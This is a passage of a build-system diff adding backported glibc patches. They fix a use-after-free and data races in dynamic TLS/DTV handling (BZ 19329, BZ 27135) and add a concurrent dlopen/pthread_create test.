4SRCREV_localedef ?= "cd9f958c4c94a638fa7b2b4e21627364f1a1a655" 4SRCREV_localedef ?= "cd9f958c4c94a638fa7b2b4e21627364f1a1a655"
5 5
6GLIBC_GIT_URI ?= "git://sourceware.org/git/glibc.git" 6GLIBC_GIT_URI ?= "git://sourceware.org/git/glibc.git"
diff --git a/meta/recipes-core/glibc/glibc.inc b/meta/recipes-core/glibc/glibc.inc
index 23a6ca99ae..e42040f3dc 100644
--- a/meta/recipes-core/glibc/glibc.inc
+++ b/meta/recipes-core/glibc/glibc.inc
@@ -1,7 +1,9 @@
1require glibc-common.inc 1require glibc-common.inc
2require glibc-ld.inc 2require glibc-ld.inc
3 3
4DEPENDS = "virtual/${TARGET_PREFIX}gcc libgcc-initial linux-libc-headers" 4DEPENDS = "virtual/${TARGET_PREFIX}gcc virtual/${TARGET_PREFIX}binutils${BUSUFFIX} libgcc-initial linux-libc-headers"
5BUSUFFIX= ""
6BUSUFFIX:class-nativesdk = "-crosssdk"
5 7
6PROVIDES = "virtual/libc" 8PROVIDES = "virtual/libc"
7PROVIDES += "virtual/libintl virtual/libiconv" 9PROVIDES += "virtual/libintl virtual/libiconv"
diff --git a/meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch b/meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch
new file mode 100644
index 0000000000..dba491f4dc
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch
@@ -0,0 +1,66 @@
1From c0669ae1a629e16b536bf11cdd0865e0dbcf4bee Mon Sep 17 00:00:00 2001
2From: Szabolcs Nagy <szabolcs.nagy@arm.com>
3Date: Wed, 30 Dec 2020 21:52:38 +0000
4Subject: [PATCH] elf: Refactor _dl_update_slotinfo to avoid use after free
5
6map is not valid to access here because it can be freed by a concurrent
7dlclose: during tls access (via __tls_get_addr) _dl_update_slotinfo is
8called without holding dlopen locks. So don't check the modid of map.
9
10The map == 0 and map != 0 code paths can be shared (avoiding the dtv
11resize in case of map == 0 is just an optimization: larger dtv than
12necessary would be fine too).
13
14Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org>
15---
16 elf/dl-tls.c | 21 +++++----------------
17 1 file changed, 5 insertions(+), 16 deletions(-)
18---
19Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=c0669ae1a629e16b536bf11cdd0865e0dbcf4bee]
20Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
21Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
22---
23diff --git a/elf/dl-tls.c b/elf/dl-tls.c
24index 24d00c14ef..f8b32b3ecb 100644
25--- a/elf/dl-tls.c
26+++ b/elf/dl-tls.c
27@@ -743,6 +743,8 @@ _dl_update_slotinfo (unsigned long int req_modid)
28 {
29 for (size_t cnt = total == 0 ? 1 : 0; cnt < listp->len; ++cnt)
30 {
31+ size_t modid = total + cnt;
32+
33 size_t gen = listp->slotinfo[cnt].gen;
34
35 if (gen > new_gen)
36@@ -758,25 +760,12 @@ _dl_update_slotinfo (unsigned long int req_modid)
37
38 /* If there is no map this means the entry is empty. */
39 struct link_map *map = listp->slotinfo[cnt].map;
40- if (map == NULL)
41- {
42- if (dtv[-1].counter >= total + cnt)
43- {
44- /* If this modid was used at some point the memory
45- might still be allocated. */
46- free (dtv[total + cnt].pointer.to_free);
47- dtv[total + cnt].pointer.val = TLS_DTV_UNALLOCATED;
48- dtv[total + cnt].pointer.to_free = NULL;
49- }
50-
51- continue;
52- }
53-
54 /* Check whether the current dtv array is large enough. */
55- size_t modid = map->l_tls_modid;
56- assert (total + cnt == modid);
57 if (dtv[-1].counter < modid)
58 {
59+ if (map == NULL)
60+ continue;
61+
62 /* Resize the dtv. */
63 dtv = _dl_resize_dtv (dtv);
64
65--
662.27.0
diff --git a/meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch b/meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch
new file mode 100644
index 0000000000..25beee1d50
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch
@@ -0,0 +1,191 @@
1From 1387ad6225c2222f027790e3f460e31aa5dd2c54 Mon Sep 17 00:00:00 2001
2From: Szabolcs Nagy <szabolcs.nagy@arm.com>
3Date: Wed, 30 Dec 2020 19:19:37 +0000
4Subject: [PATCH] elf: Fix data races in pthread_create and TLS access [BZ
5 #19329]
6
7DTV setup at thread creation (_dl_allocate_tls_init) is changed
8to take the dlopen lock, GL(dl_load_lock). Avoiding data races
9here without locks would require design changes: the map that is
10accessed for static TLS initialization here may be concurrently
11freed by dlclose. That use after free may be solved by only
12locking around static TLS setup or by ensuring dlclose does not
13free modules with static TLS, however currently every link map
14with TLS has to be accessed at least to see if it needs static
15TLS. And even if that's solved, still a lot of atomics would be
16needed to synchronize DTV related globals without a lock. So fix
17both bug 19329 and bug 27111 with a lock that prevents DTV setup
18running concurrently with dlopen or dlclose.
19
20_dl_update_slotinfo at TLS access still does not use any locks
21so CONCURRENCY NOTES are added to explain the synchronization.
22The early exit from the slotinfo walk when max_modid is reached
23is not strictly necessary, but does not hurt either.
24
25An incorrect acquire load was removed from _dl_resize_dtv: it
26did not synchronize with any release store or fence and
27synchronization is now handled separately at thread creation
28and TLS access time.
29
30There are still a number of racy read accesses to globals that
31will be changed to relaxed MO atomics in a followup patch. This
32should not introduce regressions compared to existing behaviour
33and avoid cluttering the main part of the fix.
34
35Not all TLS access related data races got fixed here: there are
36additional races at lazy tlsdesc relocations see bug 27137.
37
38Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org>
39---
40 elf/dl-tls.c | 63 +++++++++++++++++++++++++++++++++++++++-------------
41 1 file changed, 47 insertions(+), 16 deletions(-)
42---
43Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=1387ad6225c2222f027790e3f460e31aa5dd2c54]
44Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
45Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
46---
47diff --git a/elf/dl-tls.c b/elf/dl-tls.c
48index 6baff0c1ea..94f3cdbae0 100644
49--- a/elf/dl-tls.c
50+++ b/elf/dl-tls.c
51@@ -475,14 +475,11 @@ extern dtv_t _dl_static_dtv[];
52 #endif
53
54 static dtv_t *
55-_dl_resize_dtv (dtv_t *dtv)
56+_dl_resize_dtv (dtv_t *dtv, size_t max_modid)
57 {
58 /* Resize the dtv. */
59 dtv_t *newp;
60- /* Load GL(dl_tls_max_dtv_idx) atomically since it may be written to by
61- other threads concurrently. */
62- size_t newsize
63- = atomic_load_acquire (&GL(dl_tls_max_dtv_idx)) + DTV_SURPLUS;
64+ size_t newsize = max_modid + DTV_SURPLUS;
65 size_t oldsize = dtv[-1].counter;
66
67 if (dtv == GL(dl_initial_dtv))
68@@ -528,11 +525,14 @@ _dl_allocate_tls_init (void *result)
69 size_t total = 0;
70 size_t maxgen = 0;
71
72+ /* Protects global dynamic TLS related state. */
73+ __rtld_lock_lock_recursive (GL(dl_load_lock));
74+
75 /* Check if the current dtv is big enough. */
76 if (dtv[-1].counter < GL(dl_tls_max_dtv_idx))
77 {
78 /* Resize the dtv. */
79- dtv = _dl_resize_dtv (dtv);
80+ dtv = _dl_resize_dtv (dtv, GL(dl_tls_max_dtv_idx));
81
82 /* Install this new dtv in the thread data structures. */
83 INSTALL_DTV (result, &dtv[-1]);
84@@ -600,6 +600,7 @@ _dl_allocate_tls_init (void *result)
85 listp = listp->next;
86 assert (listp != NULL);
87 }
88+ __rtld_lock_unlock_recursive (GL(dl_load_lock));
89
90 /* The DTV version is up-to-date now. */
91 dtv[0].counter = maxgen;
92@@ -734,12 +735,29 @@ _dl_update_slotinfo (unsigned long int req_modid)
93
94 if (dtv[0].counter < listp->slotinfo[idx].gen)
95 {
96- /* The generation counter for the slot is higher than what the
97- current dtv implements. We have to update the whole dtv but
98- only those entries with a generation counter <= the one for
99- the entry we need. */
100+ /* CONCURRENCY NOTES:
101+
102+ Here the dtv needs to be updated to new_gen generation count.
103+
104+ This code may be called during TLS access when GL(dl_load_lock)
105+ is not held. In that case the user code has to synchronize with
106+ dlopen and dlclose calls of relevant modules. A module m is
107+ relevant if the generation of m <= new_gen and dlclose of m is
108+ synchronized: a memory access here happens after the dlopen and
109+ before the dlclose of relevant modules. The dtv entries for
110+ relevant modules need to be updated, other entries can be
111+ arbitrary.
112+
113+ This e.g. means that the first part of the slotinfo list can be
114+ accessed race free, but the tail may be concurrently extended.
115+ Similarly relevant slotinfo entries can be read race free, but
116+ other entries are racy. However updating a non-relevant dtv
117+ entry does not affect correctness. For a relevant module m,
118+ max_modid >= modid of m. */
119 size_t new_gen = listp->slotinfo[idx].gen;
120 size_t total = 0;
121+ size_t max_modid = atomic_load_relaxed (&GL(dl_tls_max_dtv_idx));
122+ assert (max_modid >= req_modid);
123
124 /* We have to look through the entire dtv slotinfo list. */
125 listp = GL(dl_tls_dtv_slotinfo_list);
126@@ -749,12 +767,14 @@ _dl_update_slotinfo (unsigned long int req_modid)
127 {
128 size_t modid = total + cnt;
129
130+ /* Later entries are not relevant. */
131+ if (modid > max_modid)
132+ break;
133+
134 size_t gen = listp->slotinfo[cnt].gen;
135
136 if (gen > new_gen)
137- /* This is a slot for a generation younger than the
138- one we are handling now. It might be incompletely
139- set up so ignore it. */
140+ /* Not relevant. */
141 continue;
142
143 /* If the entry is older than the current dtv layout we
144@@ -771,7 +791,7 @@ _dl_update_slotinfo (unsigned long int req_modid)
145 continue;
146
147 /* Resize the dtv. */
148- dtv = _dl_resize_dtv (dtv);
149+ dtv = _dl_resize_dtv (dtv, max_modid);
150
151 assert (modid <= dtv[-1].counter);
152
153@@ -793,8 +813,17 @@ _dl_update_slotinfo (unsigned long int req_modid)
154 }
155
156 total += listp->len;
157+ if (total > max_modid)
158+ break;
159+
160+ /* Synchronize with _dl_add_to_slotinfo. Ideally this would
161+ be consume MO since we only need to order the accesses to
162+ the next node after the read of the address and on most
163+ hardware (other than alpha) a normal load would do that
164+ because of the address dependency. */
165+ listp = atomic_load_acquire (&listp->next);
166 }
167- while ((listp = listp->next) != NULL);
168+ while (listp != NULL);
169
170 /* This will be the new maximum generation counter. */
171 dtv[0].counter = new_gen;
172@@ -986,7 +1015,7 @@ _dl_add_to_slotinfo (struct link_map *l, bool do_add)
173 the first slot. */
174 assert (idx == 0);
175
176- listp = prevp->next = (struct dtv_slotinfo_list *)
177+ listp = (struct dtv_slotinfo_list *)
178 malloc (sizeof (struct dtv_slotinfo_list)
179 + TLS_SLOTINFO_SURPLUS * sizeof (struct dtv_slotinfo));
180 if (listp == NULL)
181@@ -1000,6 +1029,8 @@ cannot create TLS data structures"));
182 listp->next = NULL;
183 memset (listp->slotinfo, '\0',
184 TLS_SLOTINFO_SURPLUS * sizeof (struct dtv_slotinfo));
185+ /* Synchronize with _dl_update_slotinfo. */
186+ atomic_store_release (&prevp->next, listp);
187 }
188
189 /* Add the information into the slotinfo data structure. */
190--
1912.27.0
diff --git a/meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch b/meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch
new file mode 100644
index 0000000000..eb8ef3161c
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch
@@ -0,0 +1,206 @@
1From f4f8f4d4e0f92488431b268c8cd9555730b9afe9 Mon Sep 17 00:00:00 2001
2From: Szabolcs Nagy <szabolcs.nagy@arm.com>
3Date: Wed, 30 Dec 2020 19:19:37 +0000
4Subject: [PATCH] elf: Use relaxed atomics for racy accesses [BZ #19329]
5
6This is a follow up patch to the fix for bug 19329. This adds relaxed
7MO atomics to accesses that were previously data races but are now
8race conditions, and where relaxed MO is sufficient.
9
10The race conditions all follow the pattern that the write is behind the
11dlopen lock, but a read can happen concurrently (e.g. during tls access)
12without holding the lock. For slotinfo entries the read value only
13matters if it reads from a synchronized write in dlopen or dlclose,
14otherwise the related dtv entry is not valid to access so it is fine
15to leave it in an inconsistent state. The same applies for
16GL(dl_tls_max_dtv_idx) and GL(dl_tls_generation), but there the
17algorithm relies on the fact that the read of the last synchronized
18write is an increasing value.
19
20Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org>
21---
22 elf/dl-close.c | 20 +++++++++++++-------
23 elf/dl-open.c | 5 ++++-
24 elf/dl-tls.c | 31 +++++++++++++++++++++++--------
25 sysdeps/x86_64/dl-tls.c | 3 ++-
26 4 files changed, 42 insertions(+), 17 deletions(-)
27---
28Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=f4f8f4d4e0f92488431b268c8cd9555730b9afe9]
29Comment: Hunks from elf/dl-open.c and elf/dl-tls.c are refreshed due to offset change.
30Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
31Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
32---
33diff --git a/elf/dl-close.c b/elf/dl-close.c
34index c51becd06b..3720e47dd1 100644
35--- a/elf/dl-close.c
36+++ b/elf/dl-close.c
37@@ -79,9 +79,10 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp,
38 {
39 assert (old_map->l_tls_modid == idx);
40
41- /* Mark the entry as unused. */
42- listp->slotinfo[idx - disp].gen = GL(dl_tls_generation) + 1;
43- listp->slotinfo[idx - disp].map = NULL;
44+ /* Mark the entry as unused. These can be read concurrently. */
45+ atomic_store_relaxed (&listp->slotinfo[idx - disp].gen,
46+ GL(dl_tls_generation) + 1);
47+ atomic_store_relaxed (&listp->slotinfo[idx - disp].map, NULL);
48 }
49
50 /* If this is not the last currently used entry no need to look
51@@ -96,8 +97,8 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp,
52
53 if (listp->slotinfo[idx - disp].map != NULL)
54 {
55- /* Found a new last used index. */
56- GL(dl_tls_max_dtv_idx) = idx;
57+ /* Found a new last used index. This can be read concurrently. */
58+ atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), idx);
59 return true;
60 }
61 }
62@@ -571,7 +572,9 @@ _dl_close_worker (struct link_map *map, bool force)
63 GL(dl_tls_dtv_slotinfo_list), 0,
64 imap->l_init_called))
65 /* All dynamically loaded modules with TLS are unloaded. */
66- GL(dl_tls_max_dtv_idx) = GL(dl_tls_static_nelem);
67+ /* Can be read concurrently. */
68+ atomic_store_relaxed (&GL(dl_tls_max_dtv_idx),
69+ GL(dl_tls_static_nelem));
70
71 if (imap->l_tls_offset != NO_TLS_OFFSET
72 && imap->l_tls_offset != FORCED_DYNAMIC_TLS_OFFSET)
73@@ -769,8 +772,11 @@ _dl_close_worker (struct link_map *map, bool force)
74 /* If we removed any object which uses TLS bump the generation counter. */
75 if (any_tls)
76 {
77- if (__glibc_unlikely (++GL(dl_tls_generation) == 0))
78+ size_t newgen = GL(dl_tls_generation) + 1;
79+ if (__glibc_unlikely (newgen == 0))
80 _dl_fatal_printf ("TLS generation counter wrapped! Please report as described in "REPORT_BUGS_TO".\n");
81+ /* Can be read concurrently. */
82+ atomic_store_relaxed (&GL(dl_tls_generation), newgen);
83
84 if (tls_free_end == GL(dl_tls_static_used))
85 GL(dl_tls_static_used) = tls_free_start;
86diff --git a/elf/dl-open.c b/elf/dl-open.c
87index 09f0df7d38..bb79ef00f1 100644
88--- a/elf/dl-open.c
89+++ b/elf/dl-open.c
90@@ -387,9 +387,12 @@
91 }
92 }
93
94- if (__builtin_expect (++GL(dl_tls_generation) == 0, 0))
95+ size_t newgen = GL(dl_tls_generation) + 1;
96+ if (__glibc_unlikely (newgen == 0))
97 _dl_fatal_printf (N_("\
98 TLS generation counter wrapped! Please report this."));
99+ /* Can be read concurrently. */
100+ atomic_store_relaxed (&GL(dl_tls_generation), newgen);
101
102 /* We need a second pass for static tls data, because
103 _dl_update_slotinfo must not be run while calls to
104diff --git a/elf/dl-tls.c b/elf/dl-tls.c
105index 94f3cdbae0..dc69cd984e 100644
106--- a/elf/dl-tls.c
107+++ b/elf/dl-tls.c
108@@ -96,7 +96,9 @@
109 /* No gaps, allocate a new entry. */
110 nogaps:
111
112- result = ++GL(dl_tls_max_dtv_idx);
113+ result = GL(dl_tls_max_dtv_idx) + 1;
114+ /* Can be read concurrently. */
115+ atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), result);
116 }
117
118 return result;
119@@ -279,10 +281,12 @@
120 dtv_t *dtv;
121 size_t dtv_length;
122
123+ /* Relaxed MO, because the dtv size is later rechecked, not relied on. */
124+ size_t max_modid = atomic_load_relaxed (&GL(dl_tls_max_dtv_idx));
125 /* We allocate a few more elements in the dtv than are needed for the
126 initial set of modules. This should avoid in most cases expansions
127 of the dtv. */
128- dtv_length = GL(dl_tls_max_dtv_idx) + DTV_SURPLUS;
129+ dtv_length = max_modid + DTV_SURPLUS;
130 dtv = calloc (dtv_length + 2, sizeof (dtv_t));
131 if (dtv != NULL)
132 {
133@@ -687,7 +691,7 @@
134 if (modid > max_modid)
135 break;
136
137- size_t gen = listp->slotinfo[cnt].gen;
138+ size_t gen = atomic_load_relaxed (&listp->slotinfo[cnt].gen);
139
140 if (gen > new_gen)
141 /* Not relevant. */
142@@ -699,7 +703,8 @@
143 continue;
144
145 /* If there is no map this means the entry is empty. */
146- struct link_map *map = listp->slotinfo[cnt].map;
147+ struct link_map *map
148+ = atomic_load_relaxed (&listp->slotinfo[cnt].map);
149 /* Check whether the current dtv array is large enough. */
150 if (dtv[-1].counter < modid)
151 {
152@@ -843,7 +848,12 @@
153 {
154 dtv_t *dtv = THREAD_DTV ();
155
156- if (__glibc_unlikely (dtv[0].counter != GL(dl_tls_generation)))
157+ /* Update is needed if dtv[0].counter < the generation of the accessed
158+ module. The global generation counter is used here as it is easier
159+ to check. Synchronization for the relaxed MO access is guaranteed
160+ by user code, see CONCURRENCY NOTES in _dl_update_slotinfo. */
161+ size_t gen = atomic_load_relaxed (&GL(dl_tls_generation));
162+ if (__glibc_unlikely (dtv[0].counter != gen))
163 return update_get_addr (GET_ADDR_PARAM);
164
165 void *p = dtv[GET_ADDR_MODULE].pointer.val;
166@@ -866,7 +876,10 @@
167 return NULL;
168
169 dtv_t *dtv = THREAD_DTV ();
170- if (__glibc_unlikely (dtv[0].counter != GL(dl_tls_generation)))
171+ /* This may be called without holding the GL(dl_load_lock). Reading
172+ arbitrary gen value is fine since this is best effort code. */
173+ size_t gen = atomic_load_relaxed (&GL(dl_tls_generation));
174+ if (__glibc_unlikely (dtv[0].counter != gen))
175 {
176 /* This thread's DTV is not completely current,
177 but it might already cover this module. */
178@@ -961,7 +974,9 @@
179 /* Add the information into the slotinfo data structure. */
180 if (do_add)
181 {
182- listp->slotinfo[idx].map = l;
183- listp->slotinfo[idx].gen = GL(dl_tls_generation) + 1;
184+ /* Can be read concurrently. See _dl_update_slotinfo. */
185+ atomic_store_relaxed (&listp->slotinfo[idx].map, l);
186+ atomic_store_relaxed (&listp->slotinfo[idx].gen,
187+ GL(dl_tls_generation) + 1);
188 }
189 }
190
191diff --git a/sysdeps/x86_64/dl-tls.c b/sysdeps/x86_64/dl-tls.c
192index 6595f6615b..24ef560b71 100644
193--- a/sysdeps/x86_64/dl-tls.c
194+++ b/sysdeps/x86_64/dl-tls.c
195@@ -40,7 +40,8 @@ __tls_get_addr_slow (GET_ADDR_ARGS)
196 {
197 dtv_t *dtv = THREAD_DTV ();
198
199- if (__glibc_unlikely (dtv[0].counter != GL(dl_tls_generation)))
200+ size_t gen = atomic_load_relaxed (&GL(dl_tls_generation));
201+ if (__glibc_unlikely (dtv[0].counter != gen))
202 return update_get_addr (GET_ADDR_PARAM);
203
204 return tls_get_addr_tail (GET_ADDR_PARAM, dtv, NULL);
205--
2062.27.0
diff --git a/meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch b/meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch
new file mode 100644
index 0000000000..f22e52ea99
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch
@@ -0,0 +1,144 @@
1From 9d0e30329c23b5ad736fda3f174208c25970dbce Mon Sep 17 00:00:00 2001
2From: Szabolcs Nagy <szabolcs.nagy@arm.com>
3Date: Tue, 13 Dec 2016 12:28:41 +0000
4Subject: [PATCH] elf: Add test case for [BZ #19329]
5
6Test concurrent dlopen and pthread_create when the loaded modules have
7TLS. This triggers dl-tls assertion failures more reliably than the
8nptl/tst-stack4 test.
9
10The dlopened module has 100 DT_NEEDED dependencies with TLS, they were
11reused from an existing TLS test. The number of created threads during
12dlopen depends on filesystem speed and hardware, but at most 3 threads
13are alive at a time to limit resource usage.
14
15Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org>
16---
17 elf/Makefile | 9 ++++--
18 elf/tst-tls21.c | 68 ++++++++++++++++++++++++++++++++++++++++++++++
19 elf/tst-tls21mod.c | 1 +
20 3 files changed, 76 insertions(+), 2 deletions(-)
21 create mode 100644 elf/tst-tls21.c
22 create mode 100644 elf/tst-tls21mod.c
23---
24Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=9d0e30329c23b5ad736fda3f174208c25970dbce]
25Comment: Hunks from elf/Makefile are refreshed as per glibc 2.31 codebase.
26Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
27Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
28---
29diff --git a/elf/Makefile b/elf/Makefile
30index d3e909637a..3241cb6046 100644
31--- a/elf/Makefile
32+++ b/elf/Makefile
33@@ -201,7 +201,7 @@
34 tst-unwind-ctor tst-unwind-main tst-audit13 \
35 tst-sonamemove-link tst-sonamemove-dlopen tst-dlopen-tlsmodid \
36 tst-dlopen-self tst-auditmany tst-initfinilazyfail tst-dlopenfail \
37- tst-dlopenfail-2
38+ tst-dlopenfail-2 tst-tls21
39 # reldep9
40 tests-internal += loadtest unload unload2 circleload1 \
41 neededtest neededtest2 neededtest3 neededtest4 \
42@@ -312,7 +312,7 @@
43 tst-auditmanymod7 tst-auditmanymod8 tst-auditmanymod9 \
44 tst-initlazyfailmod tst-finilazyfailmod \
45 tst-dlopenfailmod1 tst-dlopenfaillinkmod tst-dlopenfailmod2 \
46- tst-dlopenfailmod3 tst-ldconfig-ld-mod
47+ tst-dlopenfailmod3 tst-ldconfig-ld-mod tst-tls21mod
48 # Most modules build with _ISOMAC defined, but those filtered out
49 # depend on internal headers.
50 modules-names-tests = $(filter-out ifuncmod% tst-libc_dlvsym-dso tst-tlsmod%,\
51@@ -1697,5 +1697,10 @@
52 $(objpfx)tst-dlopen-nodelete-reloc-mod16.so
53 LDFLAGS-tst-dlopen-nodelete-reloc-mod17.so = -Wl,--no-as-needed
54
55+# Reuses tst-tls-many-dynamic-modules
56+$(objpfx)tst-tls21: $(libdl) $(shared-thread-library)
57+$(objpfx)tst-tls21.out: $(objpfx)tst-tls21mod.so
58+$(objpfx)tst-tls21mod.so: $(tst-tls-many-dynamic-modules:%=$(objpfx)%.so)
59+
60 $(objpfx)tst-ldconfig-ld_so_conf-update.out: $(objpfx)tst-ldconfig-ld-mod.so
61 $(objpfx)tst-ldconfig-ld_so_conf-update: $(libdl)
62diff --git a/elf/tst-tls21.c b/elf/tst-tls21.c
63new file mode 100644
64index 0000000000..560bf5813a
65--- /dev/null
66+++ b/elf/tst-tls21.c
67@@ -0,0 +1,68 @@
68+/* Test concurrent dlopen and pthread_create: BZ 19329.
69+ Copyright (C) 2021 Free Software Foundation, Inc.
70+ This file is part of the GNU C Library.
71+
72+ The GNU C Library is free software; you can redistribute it and/or
73+ modify it under the terms of the GNU Lesser General Public
74+ License as published by the Free Software Foundation; either
75+ version 2.1 of the License, or (at your option) any later version.
76+
77+ The GNU C Library is distributed in the hope that it will be useful,
78+ but WITHOUT ANY WARRANTY; without even the implied warranty of
79+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
80+ Lesser General Public License for more details.
81+
82+ You should have received a copy of the GNU Lesser General Public
83+ License along with the GNU C Library; if not, see
84+ <http://www.gnu.org/licenses/>. */
85+
86+#include <dlfcn.h>
87+#include <pthread.h>
88+#include <stdio.h>
89+#include <stdatomic.h>
90+#include <support/xdlfcn.h>
91+#include <support/xthread.h>
92+
93+#define THREADS 10000
94+
95+static atomic_int done;
96+
97+static void *
98+start (void *a)
99+{
100+ /* Load a module with many dependencies that each have TLS. */
101+ xdlopen ("tst-tls21mod.so", RTLD_LAZY);
102+ atomic_store_explicit (&done, 1, memory_order_release);
103+ return 0;
104+}
105+
106+static void *
107+nop (void *a)
108+{
109+ return 0;
110+}
111+
112+static int
113+do_test (void)
114+{
115+ pthread_t t1, t2;
116+ int i;
117+
118+ /* Load a module with lots of dependencies and TLS. */
119+ t1 = xpthread_create (0, start, 0);
120+
121+ /* Concurrently create lots of threads until dlopen is observably done. */
122+ for (i = 0; i < THREADS; i++)
123+ {
124+ if (atomic_load_explicit (&done, memory_order_acquire) != 0)
125+ break;
126+ t2 = xpthread_create (0, nop, 0);
127+ xpthread_join (t2);
128+ }
129+
130+ xpthread_join (t1);
131+ printf ("threads created during dlopen: %d\n", i);
132+ return 0;
133+}
134+
135+#include <support/test-driver.c>
136diff --git a/elf/tst-tls21mod.c b/elf/tst-tls21mod.c
137new file mode 100644
138index 0000000000..206ece4fb3
139--- /dev/null
140+++ b/elf/tst-tls21mod.c
141@@ -0,0 +1 @@
142+int __thread x;
143--
1442.27.0
diff --git a/meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch b/meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch
new file mode 100644
index 0000000000..a87afe3230
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch
@@ -0,0 +1,180 @@
1From ba33937be210da5d07f7f01709323743f66011ce Mon Sep 17 00:00:00 2001
2From: Adhemerval Zanella <adhemerval.zanella@linaro.org>
3Date: Fri, 25 Jun 2021 10:54:12 -0300
4Subject: [PATCH] elf: Fix DTV gap reuse logic (BZ #27135)
5
6This is updated version of the 572bd547d57a (reverted by 40ebfd016ad2)
7that fixes the _dl_next_tls_modid issues.
8
9This issue with 572bd547d57a patch is the DTV entry will be only
10update on dl_open_worker() with the update_tls_slotinfo() call after
11all dependencies are being processed by _dl_map_object_deps(). However
12_dl_map_object_deps() itself might call _dl_next_tls_modid(), and since
13the _dl_tls_dtv_slotinfo_list::map is not yet set the entry will be
14wrongly reused.
15
16This patch fixes by renaming the _dl_next_tls_modid() function to
17_dl_assign_tls_modid() and by passing the link_map so it can set
18the slotinfo value so a subsequente _dl_next_tls_modid() call will
19see the entry as allocated.
20
21The intermediary value is cleared up on remove_slotinfo() for the case
22a library fails to load with RTLD_NOW.
23
24This patch fixes BZ #27135.
25
26Checked on x86_64-linux-gnu.
27
28Reviewed-by: Szabolcs Nagy <szabolcs.nagy@arm.com>
29---
30 elf/dl-close.c | 8 +-
31 elf/dl-load.c | 2 +-
32 elf/dl-open.c | 10 --
33 elf/dl-tls.c | 17 +--
34 elf/rtld.c | 2 +-
35 sysdeps/generic/ldsodefs.h | 4 +-
36 6 files changed, 349 insertions(+), 33 deletions(-)
37---
38Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=ba33937be210da5d07f7f01709323743f66011ce]
39Comment: Removed hunks those were related to test. Hunk from elf/rtld.c is refreshed.
40Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
41Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
42---
43diff --git a/elf/dl-close.c b/elf/dl-close.c
44index 3720e47dd1..f39001cab9 100644
45--- a/elf/dl-close.c
46+++ b/elf/dl-close.c
47@@ -77,8 +77,6 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp,
48 object that wasn't fully set up. */
49 if (__glibc_likely (old_map != NULL))
50 {
51- assert (old_map->l_tls_modid == idx);
52-
53 /* Mark the entry as unused. These can be read concurrently. */
54 atomic_store_relaxed (&listp->slotinfo[idx - disp].gen,
55 GL(dl_tls_generation) + 1);
56@@ -88,7 +86,11 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp,
57 /* If this is not the last currently used entry no need to look
58 further. */
59 if (idx != GL(dl_tls_max_dtv_idx))
60- return true;
61+ {
62+ /* There is an unused dtv entry in the middle. */
63+ GL(dl_tls_dtv_gaps) = true;
64+ return true;
65+ }
66 }
67
68 while (idx - disp > (disp == 0 ? 1 + GL(dl_tls_static_nelem) : 0))
69diff --git a/elf/dl-load.c b/elf/dl-load.c
70index a08df001af..650e4edc35 100644
71--- a/elf/dl-load.c
72+++ b/elf/dl-load.c
73@@ -1498,7 +1498,7 @@ cannot enable executable stack as shared object requires");
74 not set up TLS data structures, so don't use them now. */
75 || __glibc_likely (GL(dl_tls_dtv_slotinfo_list) != NULL)))
76 /* Assign the next available module ID. */
77- l->l_tls_modid = _dl_next_tls_modid ();
78+ _dl_assign_tls_modid (l);
79
80 #ifdef DL_AFTER_LOAD
81 DL_AFTER_LOAD (l);
82diff --git a/elf/dl-open.c b/elf/dl-open.c
83index a066f39bd0..d2240d8747 100644
84--- a/elf/dl-open.c
85+++ b/elf/dl-open.c
